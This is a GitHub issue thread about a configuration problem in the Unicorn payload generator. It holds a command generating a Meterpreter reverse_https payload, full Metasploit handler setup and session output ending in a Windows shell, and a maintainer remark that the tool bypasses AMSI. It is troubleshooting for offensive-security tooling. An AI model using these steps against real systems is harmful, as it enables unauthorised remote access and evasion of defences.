[-] Unknown command: shell. set AutoLoadStdapi false stops Meterpreter working as expected.
myexploit opened this issue · 2 comments
Nice work on the update by the way, AMSI seems to spot the "PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443" example but I’m getting shells, and that keeps me happy.
I have spotted that if you include AutoLoadStdapi false in your MSF handler script as is now included in unicorn.rc you don’t seem to be able to use most of Meterpreter functions.
I just spotted it while testing the update.
Below is my testing
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.29
LHOST => 192.168.1.29
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > set AutoVerifySession false
AutoVerifySession => false
msf5 exploit(multi/handler) > set AutoSystemInfo false
AutoSystemInfo => false
msf5 exploit(multi/handler) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf5 exploit(multi/handler) > exploit -j
[] Exploit running as background job 0.
[] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[] Started HTTPS reverse handler on https://192.168.1.29:443
[] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...
msf5 exploit(multi/handler) >
[] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49215) at 2019-05-16 17:06:44 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
[] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49216) at 2019-05-16 17:06:45 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
[-] Unknown command: shell.
meterpreter > background
Retrying without the “set AutoLoadStdapi false” switch.
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.29
LHOST => 192.168.1.29
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > exploit -j
[] Exploit running as background job 0.
[] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[] Started HTTPS reverse handler on https://192.168.1.29:443
[] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session...
[] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49238) at 2019-05-16 17:08:01 +0100
[] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49239) at 2019-05-16 17:08:03 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 3948 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Thanks! This is expected because if you load stdapi as part of the initial stager, in my testing it would kill the shell. The problem is there are a lot of hardcoded things inside of MSF and unfortunately it's a cat/mouse game on that front. While Unicorn bypasses AMSI - the shellcode loaders in MSF are problematic. Custom C2 would be fine, or Cobalt Strike as an example.
That makes sense I will try CS tomorrow, Cheers for quick reply.